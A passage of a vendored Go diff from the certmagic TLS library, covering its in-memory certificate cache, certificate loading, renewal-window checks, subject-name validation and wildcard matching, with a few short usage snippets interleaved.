// Used to signal when stopping is completed
|
||||
doneChan chan struct{}
|
||||
|
||||
logger *zap.Logger
|
||||
}
|
||||
|
||||
// NewCache returns a new, valid Cache for efficiently
|
||||
// accessing certificates in memory. It also begins a
|
||||
// maintenance goroutine to tend to the certificates
|
||||
// in the cache. Call Stop() when you are done with the
|
||||
// cache so it can clean up locks and stuff.
|
||||
//
|
||||
// Most users of this package will not need to call this
|
||||
// because a default certificate cache is created for you.
|
||||
// Only advanced use cases require creating a new cache.
|
||||
//
|
||||
// This function panics if opts.GetConfigForCert is not
|
||||
// set. The reason is that a cache absolutely needs to
|
||||
// be able to get a Config with which to manage TLS
|
||||
// assets, and it is not safe to assume that the Default
|
||||
// config is always the correct one, since you have
|
||||
// created the cache yourself.
|
||||
//
|
||||
// See the godoc for Cache to use it properly. When
|
||||
// no longer needed, caches should be stopped with
|
||||
// Stop() to clean up resources even if the process
|
||||
// is being terminated, so that it can clean up
|
||||
// any locks for other processes to unblock!
|
||||
func NewCache(opts CacheOptions) *Cache {
|
||||
// assume default options if necessary
|
||||
if opts.OCSPCheckInterval <= 0 {
|
||||
opts.OCSPCheckInterval = DefaultOCSPCheckInterval
|
||||
}
|
||||
if opts.RenewCheckInterval <= 0 {
|
||||
opts.RenewCheckInterval = DefaultRenewCheckInterval
|
||||
}
|
||||
if opts.Capacity < 0 {
|
||||
opts.Capacity = 0
|
||||
}
|
||||
|
||||
// this must be set, because we cannot
|
||||
// safely assume that the Default Config
|
||||
// is always the correct one to use
|
||||
if opts.GetConfigForCert == nil {
|
||||
panic("cache must be initialized with a GetConfigForCert callback")
|
||||
}
|
||||
|
||||
c := &Cache{
|
||||
options: opts,
|
||||
cache: make(map[string]Certificate),
|
||||
cacheIndex: make(map[string][]string),
|
||||
stopChan: make(chan struct{}),
|
||||
doneChan: make(chan struct{}),
|
||||
logger: opts.Logger,
|
||||
}
|
||||
|
||||
go c.maintainAssets(0)
|
||||
|
||||
return c
|
||||
}
|
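Since NewCache panics without a GetConfigForCert callback, the usual pattern ties the cache and its Configs together; a minimal sketch, assuming certmagic.New and a single shared Config:

var cache *certmagic.Cache
cache = certmagic.NewCache(certmagic.CacheOptions{
	// Must return a Config associated with this same cache.
	GetConfigForCert: func(certmagic.Certificate) (*certmagic.Config, error) {
		return certmagic.New(cache, certmagic.Config{}), nil
	},
})
defer cache.Stop() // release locks and stop maintenance when done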
||||
|
||||
// Stop stops the maintenance goroutine for
|
||||
// certificates in certCache. It blocks until
|
||||
// stopping is complete. Once a cache is
|
||||
// stopped, it cannot be reused.
|
||||
func (certCache *Cache) Stop() {
|
||||
close(certCache.stopChan) // signal to stop
|
||||
<-certCache.doneChan // wait for stop to complete
|
||||
}
|
||||
|
||||
// CacheOptions is used to configure certificate caches.
|
||||
// Once a cache has been created with certain options,
|
||||
// those settings cannot be changed.
|
||||
type CacheOptions struct {
|
||||
// REQUIRED. A function that returns a configuration
|
||||
// used for managing a certificate, or for accessing
|
||||
// that certificate's asset storage (e.g. for
|
||||
// OCSP staples, etc). The returned Config MUST
|
||||
// be associated with the same Cache as the caller.
|
||||
//
|
||||
// The reason this is a callback function, dynamically
|
||||
// returning a Config (instead of attaching a static
|
||||
// pointer to a Config on each certificate) is because
|
||||
// the config for how to manage a domain's certificate
|
||||
// might change from maintenance to maintenance. The
|
||||
// cache is so long-lived, we cannot assume that the
|
||||
// host's situation will always be the same; e.g. the
|
||||
// certificate might switch DNS providers, so the DNS
|
||||
// challenge (if used) would need to be adjusted from
|
||||
// the last time it was run ~8 weeks ago.
|
||||
GetConfigForCert ConfigGetter
|
||||
|
||||
// How often to check OCSP staples for updates;
|
||||
// if unset, DefaultOCSPCheckInterval will be used.
|
||||
OCSPCheckInterval time.Duration
|
||||
|
||||
// How often to check certificates for renewal;
|
||||
// if unset, DefaultRenewCheckInterval will be used.
|
||||
RenewCheckInterval time.Duration
|
||||
|
||||
// Maximum number of certificates to allow in the cache.
|
||||
// If reached, certificates will be randomly evicted to
|
||||
// make room for new ones. 0 means unlimited.
|
||||
Capacity int
|
||||
|
||||
// Set a logger to enable logging
|
||||
Logger *zap.Logger
|
||||
}
|
||||
|
||||
// ConfigGetter is a function that returns a prepared,
|
||||
// valid config that should be used when managing the
|
||||
// given certificate or its assets.
|
||||
type ConfigGetter func(Certificate) (*Config, error)
|
||||
|
||||
// cacheCertificate calls unsyncedCacheCertificate with a write lock.
|
||||
//
|
||||
// This function is safe for concurrent use.
|
||||
func (certCache *Cache) cacheCertificate(cert Certificate) {
|
||||
certCache.mu.Lock()
|
||||
certCache.unsyncedCacheCertificate(cert)
|
||||
certCache.mu.Unlock()
|
||||
}
|
||||
|
||||
// unsyncedCacheCertificate adds cert to the in-memory cache unless
|
||||
// it already exists in the cache (according to cert.Hash). It
|
||||
// updates the name index.
|
||||
//
|
||||
// This function is NOT safe for concurrent use. Callers MUST acquire
|
||||
// a write lock on certCache.mu first.
|
||||
func (certCache *Cache) unsyncedCacheCertificate(cert Certificate) {
|
||||
// no-op if this certificate already exists in the cache
|
||||
if _, ok := certCache.cache[cert.hash]; ok {
|
||||
if certCache.logger != nil {
|
||||
certCache.logger.Debug("certificate already cached",
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter),
|
||||
zap.Bool("managed", cert.managed),
|
||||
zap.String("issuer_key", cert.issuerKey),
|
||||
zap.String("hash", cert.hash))
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
// if the cache is at capacity, make room for new cert
|
||||
cacheSize := len(certCache.cache)
|
||||
if certCache.options.Capacity > 0 && cacheSize >= certCache.options.Capacity {
|
||||
// Go maps are "nondeterministic" but not actually random,
|
||||
// so although we could just chop off the "front" of the
|
||||
// map with less code, that is a heavily skewed eviction
|
||||
// strategy; generating random numbers is cheap and
|
||||
// ensures a much better distribution.
|
||||
rnd := weakrand.Intn(cacheSize)
|
||||
i := 0
|
||||
for _, randomCert := range certCache.cache {
|
||||
if i == rnd {
|
||||
if certCache.logger != nil {
|
||||
certCache.logger.Debug("cache full; evicting random certificate",
|
||||
zap.Strings("removing_subjects", randomCert.Names),
|
||||
zap.String("removing_hash", randomCert.hash),
|
||||
zap.Strings("inserting_subjects", cert.Names),
|
||||
zap.String("inserting_hash", cert.hash))
|
||||
}
|
||||
certCache.removeCertificate(randomCert)
|
||||
break
|
||||
}
|
||||
i++
|
||||
}
|
||||
}
|
||||
|
||||
// store the certificate
|
||||
certCache.cache[cert.hash] = cert
|
||||
|
||||
// update the index so we can access it by name
|
||||
for _, name := range cert.Names {
|
||||
certCache.cacheIndex[name] = append(certCache.cacheIndex[name], cert.hash)
|
||||
}
|
||||
|
||||
if certCache.logger != nil {
|
||||
certCache.logger.Debug("added certificate to cache",
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter),
|
||||
zap.Bool("managed", cert.managed),
|
||||
zap.String("issuer_key", cert.issuerKey),
|
||||
zap.String("hash", cert.hash),
|
||||
zap.Int("cache_size", len(certCache.cache)),
|
||||
zap.Int("cache_capacity", certCache.options.Capacity))
|
||||
}
|
||||
}
|
||||
|
||||
// removeCertificate removes cert from the cache.
|
||||
//
|
||||
// This function is NOT safe for concurrent use; callers
|
||||
// MUST first acquire a write lock on certCache.mu.
|
||||
func (certCache *Cache) removeCertificate(cert Certificate) {
|
||||
// delete all mentions of this cert from the name index
|
||||
for _, name := range cert.Names {
|
||||
keyList := certCache.cacheIndex[name]
|
||||
for i := 0; i < len(keyList); i++ {
|
||||
if keyList[i] == cert.hash {
|
||||
keyList = append(keyList[:i], keyList[i+1:]...)
|
||||
i--
|
||||
}
|
||||
}
|
||||
if len(keyList) == 0 {
|
||||
delete(certCache.cacheIndex, name)
|
||||
} else {
|
||||
certCache.cacheIndex[name] = keyList
|
||||
}
|
||||
}
|
||||
|
||||
// delete the actual cert from the cache
|
||||
delete(certCache.cache, cert.hash)
|
||||
|
||||
if certCache.logger != nil {
|
||||
certCache.logger.Debug("removed certificate from cache",
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter),
|
||||
zap.Bool("managed", cert.managed),
|
||||
zap.String("issuer_key", cert.issuerKey),
|
||||
zap.String("hash", cert.hash),
|
||||
zap.Int("cache_size", len(certCache.cache)),
|
||||
zap.Int("cache_capacity", certCache.options.Capacity))
|
||||
}
|
||||
}
|
||||
|
||||
// replaceCertificate atomically replaces oldCert with newCert in
|
||||
// the cache.
|
||||
//
|
||||
// This method is safe for concurrent use.
|
||||
func (certCache *Cache) replaceCertificate(oldCert, newCert Certificate) {
|
||||
certCache.mu.Lock()
|
||||
certCache.removeCertificate(oldCert)
|
||||
certCache.unsyncedCacheCertificate(newCert)
|
||||
certCache.mu.Unlock()
|
||||
if certCache.logger != nil {
|
||||
certCache.logger.Info("replaced certificate in cache",
|
||||
zap.Strings("subjects", newCert.Names),
|
||||
zap.Time("new_expiration", newCert.Leaf.NotAfter))
|
||||
}
|
||||
}
|
||||
|
||||
func (certCache *Cache) getAllMatchingCerts(name string) []Certificate {
|
||||
certCache.mu.RLock()
|
||||
defer certCache.mu.RUnlock()
|
||||
|
||||
allCertKeys := certCache.cacheIndex[name]
|
||||
|
||||
certs := make([]Certificate, len(allCertKeys))
|
||||
for i := range allCertKeys {
|
||||
certs[i] = certCache.cache[allCertKeys[i]]
|
||||
}
|
||||
|
||||
return certs
|
||||
}
|
||||
|
||||
func (certCache *Cache) getAllCerts() []Certificate {
|
||||
certCache.mu.RLock()
|
||||
defer certCache.mu.RUnlock()
|
||||
certs := make([]Certificate, 0, len(certCache.cache))
|
||||
for _, cert := range certCache.cache {
|
||||
certs = append(certs, cert)
|
||||
}
|
||||
return certs
|
||||
}
|
||||
|
||||
func (certCache *Cache) getConfig(cert Certificate) (*Config, error) {
|
||||
cfg, err := certCache.options.GetConfigForCert(cert)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if cfg.certCache != nil && cfg.certCache != certCache {
|
||||
return nil, fmt.Errorf("config returned for certificate %v is not nil and points to different cache; got %p, expected %p (this one)",
|
||||
cert.Names, cfg.certCache, certCache)
|
||||
}
|
||||
return cfg, nil
|
||||
}
|
||||
|
||||
// AllMatchingCertificates returns a list of all certificates that could
|
||||
// be used to serve the given SNI name, including exact SAN matches and
|
||||
// wildcard matches.
|
||||
func (certCache *Cache) AllMatchingCertificates(name string) []Certificate {
|
||||
// get exact matches first
|
||||
certs := certCache.getAllMatchingCerts(name)
|
||||
|
||||
// then look for wildcard matches by replacing each
|
||||
// label of the domain name with wildcards
|
||||
labels := strings.Split(name, ".")
|
||||
for i := range labels {
|
||||
labels[i] = "*"
|
||||
candidate := strings.Join(labels, ".")
|
||||
certs = append(certs, certCache.getAllMatchingCerts(candidate)...)
|
||||
}
|
||||
|
||||
return certs
|
||||
}
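
As a rough sketch of how the lookup above generates wildcard candidates (an illustrative in-package helper, not part of the certmagic API): labels are replaced cumulatively, so each pass stars out one more label from the left.

func wildcardCandidates(name string) []string {
	// mirrors the loop in AllMatchingCertificates above
	labels := strings.Split(name, ".")
	candidates := make([]string, 0, len(labels))
	for i := range labels {
		labels[i] = "*"
		candidates = append(candidates, strings.Join(labels, "."))
	}
	return candidates
}

// wildcardCandidates("sub.example.com") == []string{"*.example.com", "*.*.com", "*.*.*"}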
|
||||
|
||||
var (
|
||||
defaultCache *Cache
|
||||
defaultCacheMu sync.Mutex
|
||||
)
|
429 vendor/github.com/caddyserver/certmagic/certificates.go (generated, vendored, new file)
@@ -0,0 +1,429 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/tls"
|
||||
"crypto/x509"
|
||||
"fmt"
|
||||
"net"
|
||||
"os"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"go.uber.org/zap"
|
||||
"golang.org/x/crypto/ocsp"
|
||||
)
|
||||
|
||||
// Certificate is a tls.Certificate with associated metadata tacked on.
|
||||
// Even if the metadata can be obtained by parsing the certificate,
|
||||
// it is more efficient to extract it once onto this struct,
|
||||
// but at the cost of slightly higher memory use.
|
||||
type Certificate struct {
|
||||
tls.Certificate
|
||||
|
||||
// Names is the list of subject names this
|
||||
// certificate is signed for.
|
||||
Names []string
|
||||
|
||||
// Optional; user-provided, and arbitrary.
|
||||
Tags []string
|
||||
|
||||
// OCSP contains the certificate's parsed OCSP response.
|
||||
// It is not necessarily the response that is stapled
|
||||
// (e.g. if the status is not Good), it is simply the
|
||||
// most recent OCSP response we have for this certificate.
|
||||
ocsp *ocsp.Response
|
||||
|
||||
// The hex-encoded hash of this cert's chain's bytes.
|
||||
hash string
|
||||
|
||||
// Whether this certificate is under our management.
|
||||
managed bool
|
||||
|
||||
// The unique string identifying the issuer of this certificate.
|
||||
issuerKey string
|
||||
}
|
||||
|
||||
// Empty returns true if the certificate struct is not filled out; at
|
||||
// least the tls.Certificate.Certificate field is expected to be set.
|
||||
func (cert Certificate) Empty() bool {
|
||||
return len(cert.Certificate.Certificate) == 0
|
||||
}
|
||||
|
||||
// NeedsRenewal returns true if the certificate is
|
||||
// expiring soon (according to cfg) or has expired.
|
||||
func (cert Certificate) NeedsRenewal(cfg *Config) bool {
|
||||
return currentlyInRenewalWindow(cert.Leaf.NotBefore, cert.Leaf.NotAfter, cfg.RenewalWindowRatio)
|
||||
}
|
||||
|
||||
// Expired returns true if the certificate has expired.
|
||||
func (cert Certificate) Expired() bool {
|
||||
if cert.Leaf == nil {
|
||||
// ideally cert.Leaf would never be nil, but this can happen for
|
||||
// "synthetic" certs like those made to solve the TLS-ALPN challenge
|
||||
// which adds a special cert directly to the cache, since
|
||||
// tls.X509KeyPair() discards the leaf; oh well
|
||||
return false
|
||||
}
|
||||
return time.Now().After(cert.Leaf.NotAfter)
|
||||
}
|
||||
|
||||
// currentlyInRenewalWindow returns true if the current time is
|
||||
// within the renewal window, according to the given start/end
|
||||
// dates and the ratio of the renewal window. If true is returned,
|
||||
// the certificate being considered is due for renewal.
|
||||
func currentlyInRenewalWindow(notBefore, notAfter time.Time, renewalWindowRatio float64) bool {
|
||||
if notAfter.IsZero() {
|
||||
return false
|
||||
}
|
||||
lifetime := notAfter.Sub(notBefore)
|
||||
if renewalWindowRatio == 0 {
|
||||
renewalWindowRatio = DefaultRenewalWindowRatio
|
||||
}
|
||||
renewalWindow := time.Duration(float64(lifetime) * renewalWindowRatio)
|
||||
renewalWindowStart := notAfter.Add(-renewalWindow)
|
||||
return time.Now().After(renewalWindowStart)
|
||||
}
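
For a rough worked example of the window math above, assuming a default ratio of 1/3 (the usual value of DefaultRenewalWindowRatio): a 90-day certificate enters its renewal window once fewer than 30 days of validity remain.

notBefore := time.Date(2023, 1, 1, 0, 0, 0, 0, time.UTC)
notAfter := notBefore.Add(90 * 24 * time.Hour)                          // valid for 90 days
window := time.Duration(float64(notAfter.Sub(notBefore)) * (1.0 / 3.0)) // 30 days
renewFrom := notAfter.Add(-window)                                      // 2023-03-02, i.e. day 60
needsRenewal := time.Now().After(renewFrom)
_ = needsRenewal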
|
||||
|
||||
// HasTag returns true if cert.Tags has tag.
|
||||
func (cert Certificate) HasTag(tag string) bool {
|
||||
for _, t := range cert.Tags {
|
||||
if t == tag {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// CacheManagedCertificate loads the certificate for domain into the
|
||||
// cache, from the TLS storage for managed certificates. It returns a
|
||||
// copy of the Certificate that was put into the cache.
|
||||
//
|
||||
// This is a lower-level method; normally you'll call Manage() instead.
|
||||
//
|
||||
// This method is safe for concurrent use.
|
||||
func (cfg *Config) CacheManagedCertificate(ctx context.Context, domain string) (Certificate, error) {
|
||||
cert, err := cfg.loadManagedCertificate(ctx, domain)
|
||||
if err != nil {
|
||||
return cert, err
|
||||
}
|
||||
cfg.certCache.cacheCertificate(cert)
|
||||
cfg.emit("cached_managed_cert", cert.Names)
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// loadManagedCertificate loads the managed certificate for domain from any
|
||||
// of the configured issuers' storage locations, but it does not add it to
|
||||
// the cache. It just loads from storage and returns it.
|
||||
func (cfg *Config) loadManagedCertificate(ctx context.Context, domain string) (Certificate, error) {
|
||||
certRes, err := cfg.loadCertResourceAnyIssuer(ctx, domain)
|
||||
if err != nil {
|
||||
return Certificate{}, err
|
||||
}
|
||||
cert, err := cfg.makeCertificateWithOCSP(ctx, certRes.CertificatePEM, certRes.PrivateKeyPEM)
|
||||
if err != nil {
|
||||
return cert, err
|
||||
}
|
||||
cert.managed = true
|
||||
cert.issuerKey = certRes.issuerKey
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// CacheUnmanagedCertificatePEMFile loads a certificate for host using certFile
|
||||
// and keyFile, which must be in PEM format. It stores the certificate in
|
||||
// the in-memory cache.
|
||||
//
|
||||
// This method is safe for concurrent use.
|
||||
func (cfg *Config) CacheUnmanagedCertificatePEMFile(ctx context.Context, certFile, keyFile string, tags []string) error {
|
||||
cert, err := cfg.makeCertificateFromDiskWithOCSP(ctx, cfg.Storage, certFile, keyFile)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
cert.Tags = tags
|
||||
cfg.certCache.cacheCertificate(cert)
|
||||
cfg.emit("cached_unmanaged_cert", cert.Names)
|
||||
return nil
|
||||
}
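
A minimal usage sketch for caching a certificate you manage yourself; the file paths and the nil tag list are placeholders.

cfg := NewDefault() // or a Config obtained from New()
err := cfg.CacheUnmanagedCertificatePEMFile(context.Background(),
	"/path/to/site.crt", "/path/to/site.key", nil)
if err != nil {
	log.Fatal(err)
}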
|
||||
|
||||
// CacheUnmanagedTLSCertificate adds tlsCert to the certificate cache.
|
||||
// It staples OCSP if possible.
|
||||
//
|
||||
// This method is safe for concurrent use.
|
||||
func (cfg *Config) CacheUnmanagedTLSCertificate(ctx context.Context, tlsCert tls.Certificate, tags []string) error {
|
||||
var cert Certificate
|
||||
err := fillCertFromLeaf(&cert, tlsCert)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
err = stapleOCSP(ctx, cfg.OCSP, cfg.Storage, &cert, nil)
|
||||
if err != nil && cfg.Logger != nil {
|
||||
cfg.Logger.Warn("stapling OCSP", zap.Error(err))
|
||||
}
|
||||
cfg.emit("cached_unmanaged_cert", cert.Names)
|
||||
cert.Tags = tags
|
||||
cfg.certCache.cacheCertificate(cert)
|
||||
return nil
|
||||
}
|
||||
|
||||
// CacheUnmanagedCertificatePEMBytes makes a certificate out of the PEM bytes
|
||||
// of the certificate and key, then caches it in memory.
|
||||
//
|
||||
// This method is safe for concurrent use.
|
||||
func (cfg *Config) CacheUnmanagedCertificatePEMBytes(ctx context.Context, certBytes, keyBytes []byte, tags []string) error {
|
||||
cert, err := cfg.makeCertificateWithOCSP(ctx, certBytes, keyBytes)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
cert.Tags = tags
|
||||
cfg.certCache.cacheCertificate(cert)
|
||||
cfg.emit("cached_unmanaged_cert", cert.Names)
|
||||
return nil
|
||||
}
|
||||
|
||||
// makeCertificateFromDiskWithOCSP makes a Certificate by loading the
|
||||
// certificate and key files. It fills out all the fields in
|
||||
// the certificate except for the Managed and OnDemand flags.
|
||||
// (It is up to the caller to set those.) It staples OCSP.
|
||||
func (cfg Config) makeCertificateFromDiskWithOCSP(ctx context.Context, storage Storage, certFile, keyFile string) (Certificate, error) {
|
||||
certPEMBlock, err := os.ReadFile(certFile)
|
||||
if err != nil {
|
||||
return Certificate{}, err
|
||||
}
|
||||
keyPEMBlock, err := os.ReadFile(keyFile)
|
||||
if err != nil {
|
||||
return Certificate{}, err
|
||||
}
|
||||
return cfg.makeCertificateWithOCSP(ctx, certPEMBlock, keyPEMBlock)
|
||||
}
|
||||
|
||||
// makeCertificateWithOCSP is the same as makeCertificate except that it also
|
||||
// staples OCSP to the certificate.
|
||||
func (cfg Config) makeCertificateWithOCSP(ctx context.Context, certPEMBlock, keyPEMBlock []byte) (Certificate, error) {
|
||||
cert, err := makeCertificate(certPEMBlock, keyPEMBlock)
|
||||
if err != nil {
|
||||
return cert, err
|
||||
}
|
||||
err = stapleOCSP(ctx, cfg.OCSP, cfg.Storage, &cert, certPEMBlock)
|
||||
if err != nil && cfg.Logger != nil {
|
||||
cfg.Logger.Warn("stapling OCSP", zap.Error(err), zap.Strings("identifiers", cert.Names))
|
||||
}
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// makeCertificate turns a certificate PEM bundle and a key PEM block into
|
||||
// a Certificate with necessary metadata from parsing its bytes filled into
|
||||
// its struct fields for convenience (except for the OnDemand and Managed
|
||||
// flags; it is up to the caller to set those properties!). This function
|
||||
// does NOT staple OCSP.
|
||||
func makeCertificate(certPEMBlock, keyPEMBlock []byte) (Certificate, error) {
|
||||
var cert Certificate
|
||||
|
||||
// Convert to a tls.Certificate
|
||||
tlsCert, err := tls.X509KeyPair(certPEMBlock, keyPEMBlock)
|
||||
if err != nil {
|
||||
return cert, err
|
||||
}
|
||||
|
||||
// Extract necessary metadata
|
||||
err = fillCertFromLeaf(&cert, tlsCert)
|
||||
if err != nil {
|
||||
return cert, err
|
||||
}
|
||||
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// fillCertFromLeaf populates cert from tlsCert. If it succeeds, it
|
||||
// guarantees that cert.Leaf is non-nil.
|
||||
func fillCertFromLeaf(cert *Certificate, tlsCert tls.Certificate) error {
|
||||
if len(tlsCert.Certificate) == 0 {
|
||||
return fmt.Errorf("certificate is empty")
|
||||
}
|
||||
cert.Certificate = tlsCert
|
||||
|
||||
// the leaf cert should be the one for the site; we must set
|
||||
// the tls.Certificate.Leaf field so that TLS handshakes are
|
||||
// more efficient
|
||||
leaf := cert.Certificate.Leaf
|
||||
if leaf == nil {
|
||||
var err error
|
||||
leaf, err = x509.ParseCertificate(tlsCert.Certificate[0])
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
cert.Certificate.Leaf = leaf
|
||||
}
|
||||
|
||||
// for convenience, we do want to assemble all the
|
||||
// subjects on the certificate into one list
|
||||
if leaf.Subject.CommonName != "" { // TODO: CommonName is deprecated
|
||||
cert.Names = []string{strings.ToLower(leaf.Subject.CommonName)}
|
||||
}
|
||||
for _, name := range leaf.DNSNames {
|
||||
if name != leaf.Subject.CommonName { // TODO: CommonName is deprecated
|
||||
cert.Names = append(cert.Names, strings.ToLower(name))
|
||||
}
|
||||
}
|
||||
for _, ip := range leaf.IPAddresses {
|
||||
if ipStr := ip.String(); ipStr != leaf.Subject.CommonName { // TODO: CommonName is deprecated
|
||||
cert.Names = append(cert.Names, strings.ToLower(ipStr))
|
||||
}
|
||||
}
|
||||
for _, email := range leaf.EmailAddresses {
|
||||
if email != leaf.Subject.CommonName { // TODO: CommonName is deprecated
|
||||
cert.Names = append(cert.Names, strings.ToLower(email))
|
||||
}
|
||||
}
|
||||
for _, u := range leaf.URIs {
|
||||
if u.String() != leaf.Subject.CommonName { // TODO: CommonName is deprecated
|
||||
cert.Names = append(cert.Names, u.String())
|
||||
}
|
||||
}
|
||||
if len(cert.Names) == 0 {
|
||||
return fmt.Errorf("certificate has no names")
|
||||
}
|
||||
|
||||
cert.hash = hashCertificateChain(cert.Certificate.Certificate)
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// managedCertInStorageExpiresSoon returns true if cert (being a
|
||||
// managed certificate) is expiring within RenewDurationBefore.
|
||||
// It returns false if there was an error checking the expiration
|
||||
// of the certificate as found in storage, or if the certificate
|
||||
// in storage is NOT expiring soon. A certificate that is expiring
|
||||
// soon in our cache but is not expiring soon in storage probably
|
||||
// means that another instance renewed the certificate in the
|
||||
// meantime, and it would be a good idea to simply load the cert
|
||||
// into our cache rather than repeating the renewal process again.
|
||||
func (cfg *Config) managedCertInStorageExpiresSoon(ctx context.Context, cert Certificate) (bool, error) {
|
||||
certRes, err := cfg.loadCertResourceAnyIssuer(ctx, cert.Names[0])
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
_, needsRenew := cfg.managedCertNeedsRenewal(certRes)
|
||||
return needsRenew, nil
|
||||
}
|
||||
|
||||
// reloadManagedCertificate reloads the certificate corresponding to the name(s)
|
||||
// on oldCert into the cache, from storage. This also replaces the old certificate
|
||||
// with the new one, so that all configurations that used the old cert now point
|
||||
// to the new cert. It assumes that the new certificate for oldCert.Names[0] is
|
||||
// already in storage. It returns the newly-loaded certificate if successful.
|
||||
func (cfg *Config) reloadManagedCertificate(ctx context.Context, oldCert Certificate) (Certificate, error) {
|
||||
if cfg.Logger != nil {
|
||||
cfg.Logger.Info("reloading managed certificate", zap.Strings("identifiers", oldCert.Names))
|
||||
}
|
||||
newCert, err := cfg.loadManagedCertificate(ctx, oldCert.Names[0])
|
||||
if err != nil {
|
||||
return Certificate{}, fmt.Errorf("loading managed certificate for %v from storage: %v", oldCert.Names, err)
|
||||
}
|
||||
cfg.certCache.replaceCertificate(oldCert, newCert)
|
||||
return newCert, nil
|
||||
}
|
||||
|
||||
// SubjectQualifiesForCert returns true if subj is a name which,
|
||||
// as a quick sanity check, looks like it could be the subject
|
||||
// of a certificate. Requirements are:
|
||||
// - must not be empty
|
||||
// - must not start or end with a dot (RFC 1034)
|
||||
// - must not contain common accidental special characters
|
||||
func SubjectQualifiesForCert(subj string) bool {
|
||||
// must not be empty
|
||||
return strings.TrimSpace(subj) != "" &&
|
||||
|
||||
// must not start or end with a dot
|
||||
!strings.HasPrefix(subj, ".") &&
|
||||
!strings.HasSuffix(subj, ".") &&
|
||||
|
||||
// if it has a wildcard, must be a left-most label (or exactly "*"
|
||||
// which won't be trusted by browsers but still technically works)
|
||||
(!strings.Contains(subj, "*") || strings.HasPrefix(subj, "*.") || subj == "*") &&
|
||||
|
||||
// must not contain other common special characters
|
||||
!strings.ContainsAny(subj, "()[]{}<> \t\n\"\\!@#$%^&|;'+=")
|
||||
}
|
||||
|
||||
// SubjectQualifiesForPublicCert returns true if the subject
|
||||
// name appears eligible for automagic TLS with a public
|
||||
// CA such as Let's Encrypt. For example: localhost and IP
|
||||
// addresses are not eligible because we cannot obtain certs
|
||||
// for those names with a public CA. Wildcard names are
|
||||
// allowed, as long as they conform to CABF requirements (only
|
||||
// one wildcard label, and it must be the left-most label).
|
||||
func SubjectQualifiesForPublicCert(subj string) bool {
|
||||
// must at least qualify for a certificate
|
||||
return SubjectQualifiesForCert(subj) &&
|
||||
|
||||
// localhost, .localhost TLD, and .local TLD are ineligible
|
||||
!SubjectIsInternal(subj) &&
|
||||
|
||||
// cannot be an IP address (as of yet), see
|
||||
// https://community.letsencrypt.org/t/certificate-for-static-ip/84/2?u=mholt
|
||||
!SubjectIsIP(subj) &&
|
||||
|
||||
// only one wildcard label allowed, and it must be left-most, with 3+ labels
|
||||
(!strings.Contains(subj, "*") ||
|
||||
(strings.Count(subj, "*") == 1 &&
|
||||
strings.Count(subj, ".") > 1 &&
|
||||
len(subj) > 2 &&
|
||||
strings.HasPrefix(subj, "*.")))
|
||||
}
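
A few illustrative inputs for the two checks above; the expected results follow directly from the conditions in the code.

SubjectQualifiesForCert("example.com")         // true
SubjectQualifiesForCert(".example.com")        // false: leading dot
SubjectQualifiesForPublicCert("example.com")   // true
SubjectQualifiesForPublicCert("*.example.com") // true: one left-most wildcard label
SubjectQualifiesForPublicCert("*.com")         // false: wildcard needs 3+ labels
SubjectQualifiesForPublicCert("localhost")     // false: internal name
SubjectQualifiesForPublicCert("192.168.1.10")  // false: IP address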
|
||||
|
||||
// SubjectIsIP returns true if subj is an IP address.
|
||||
func SubjectIsIP(subj string) bool {
|
||||
return net.ParseIP(subj) != nil
|
||||
}
|
||||
|
||||
// SubjectIsInternal returns true if subj is an internal-facing
|
||||
// hostname or address.
|
||||
func SubjectIsInternal(subj string) bool {
|
||||
return subj == "localhost" ||
|
||||
strings.HasSuffix(subj, ".localhost") ||
|
||||
strings.HasSuffix(subj, ".local")
|
||||
}
|
||||
|
||||
// MatchWildcard returns true if subject (a candidate DNS name)
|
||||
// matches wildcard (a reference DNS name), mostly according to
|
||||
// RFC 6125-compliant wildcard rules. See also RFC 2818 which
|
||||
// states that IP addresses must match exactly, but this function
|
||||
// does not attempt to distinguish IP addresses from internal or
|
||||
// external DNS names that happen to look like IP addresses.
|
||||
// It uses DNS wildcard matching logic and is case-insensitive.
|
||||
// https://tools.ietf.org/html/rfc2818#section-3.1
|
||||
func MatchWildcard(subject, wildcard string) bool {
|
||||
subject, wildcard = strings.ToLower(subject), strings.ToLower(wildcard)
|
||||
if subject == wildcard {
|
||||
return true
|
||||
}
|
||||
if !strings.Contains(wildcard, "*") {
|
||||
return false
|
||||
}
|
||||
labels := strings.Split(subject, ".")
|
||||
for i := range labels {
|
||||
if labels[i] == "" {
|
||||
continue // invalid label
|
||||
}
|
||||
labels[i] = "*"
|
||||
candidate := strings.Join(labels, ".")
|
||||
if candidate == wildcard {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
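
Illustrative calls for the matching logic above; the wildcard only ever covers whole labels, and matching is case-insensitive.

MatchWildcard("foo.example.com", "*.example.com") // true
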